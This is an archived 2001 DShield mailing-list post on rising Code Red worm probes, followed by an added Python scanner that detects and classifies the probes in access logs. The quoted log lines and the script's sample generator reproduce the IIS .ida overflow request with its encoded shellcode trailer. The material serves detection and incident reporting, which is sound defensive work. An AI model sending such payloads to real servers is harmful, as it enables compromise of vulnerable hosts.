[Dshield] Code Red Host Scans (and more)

John Groseclose iain at caradoc.org
Sat Aug 4 17:19:47 GMT 2001


Much as I hate to follow up my own messages, I no longer think that 
the new worm signature is an attempt to reboot the machine - it 
appears to be (according to a guy who knows Windows FAR better than I 
- I'm a UNIX and Mac guy!) a modified version of Code Red.

I've spotted probes from all over: France, parts of Asia, Taiwan, 
Japan, and an *awful* lot of probes from speakeasy.net (my provider, 
so I'm talking to them about it). I'm getting probes for this "new" 
version from networks that never tried to connect via the "old" 
version.

Today may get ugly, folks. It may get *really* ugly.

Beginning about five hours ago, I've detected 97 probes of the "new" variety:

dsl081-156-226.chi1.dsl.speakeasy.net - - [04/Aug/2001:10:11:41 -0700] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 404 277 "-" "-"

The old variety looks like this:

images.aopublishing.org - - [04/Aug/2001:10:05:01 -0700] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 400 324 "-" "-"

The probes appear to be increasing in frequency from all kinds of 
IPs, but I do note that a fair number of them appear to be repeat 
attempts.
-- 
John Groseclose
iain at caradoc.org
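As an added example (not part of the original post, and not the poster's code), the following Python scanner picks the two probe shapes quoted above out of Apache access-log lines, tells the N-padded "old" form from the X-padded "new" one, and lists hosts that hit more than once, since the post notes repeat attempts. The log format, the 224-byte padding run and the %u trailer are taken from the two lines in the post; the sample log, the benign request and the second hit from the speakeasy host are constructed. The X-padded variant that appeared on 4 August 2001 is the one that became known as Code Red II.

```python
"""Classify Code Red style /default.ida probes in Apache access-log lines.

Added example; not code from the DShield post. The log format and the two
probe shapes (N-padded "old", X-padded "new") follow the lines in the post;
the sample lines below are constructed from those shapes.
"""
import re
from collections import Counter

# Apache common log format plus the two quoted trailing fields (referer, user-agent),
# which is the shape of the lines quoted in the post.
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+)\s+(?P<uri>\S+)\s+(?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Probe shape: /default.ida? + a run of one padding byte (N or X) + a %u-encoded
# trailer ending in "=a". Both padding variants in the post carry the same trailer.
PROBE_RE = re.compile(
    r'^/default\.ida\?(?P<pad>N+|X+)(?P<trailer>(?:%u[0-9a-fA-F]{2,4})+=a)$'
)
VARIANTS = {"N": "old (N-padded)", "X": "new (X-padded)"}


def parse_line(line):
    """Return the fields of one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line.rstrip("\n"))
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def classify_probe(uri):
    """Return variant name, padding length and %u trailer for a Code Red style URI, else None."""
    m = PROBE_RE.match(uri)
    if not m:
        return None
    pad = m.group("pad")
    return {"variant": VARIANTS[pad[0]], "pad_len": len(pad), "trailer": m.group("trailer")}


def scan(lines):
    """Walk log lines; collect probes, per-host counts and hosts that probed more than once."""
    hits = []
    per_host = Counter()
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        probe = classify_probe(rec["uri"])
        if probe is None:
            continue
        per_host[rec["host"]] += 1
        hits.append({**rec, **probe})
    repeat_hosts = sorted(h for h, n in per_host.items() if n > 1)
    return {"hits": hits, "per_host": per_host, "repeat_hosts": repeat_hosts}


# The %u trailer exactly as it appears in both log lines quoted in the post.
TRAILER = ("%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801"
           "%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a")


def probe_line(host, ts, pad_char, status, size):
    """Build a log line of the shape quoted in the post (224 padding bytes; constructed sample)."""
    return f'{host} - - [{ts}] "GET /default.ida?{pad_char * 224}{TRAILER}  HTTP/1.0" {status} {size} "-" "-"'


# Constructed sample log: the two probes quoted in the post, one benign request,
# and a second (made-up) probe from the speakeasy host to show repeat detection.
SAMPLE_LOG = [
    probe_line("images.aopublishing.org", "04/Aug/2001:10:05:01 -0700", "N", 400, 324),
    probe_line("dsl081-156-226.chi1.dsl.speakeasy.net", "04/Aug/2001:10:11:41 -0700", "X", 404, 277),
    '203.0.113.7 - - [04/Aug/2001:10:12:00 -0700] "GET /index.html HTTP/1.0" 200 1523 "-" "Mozilla/4.0"',
    probe_line("dsl081-156-226.chi1.dsl.speakeasy.net", "04/Aug/2001:10:40:02 -0700", "X", 404, 277),
]

if __name__ == "__main__":
    result = scan(SAMPLE_LOG)
    for h in result["hits"]:
        print(f'{h["ts"]}  {h["host"]:40s} {h["variant"]:16s} pad={h["pad_len"]} status={h["status"]}')
    print("repeat hosts:", result["repeat_hosts"])
```

The scanner flags a probe regardless of the status code: the 404 and 400 in the post only show that this server is not IIS and refused the request, not that the probing host is clean, so the host still belongs in the list sent to its provider.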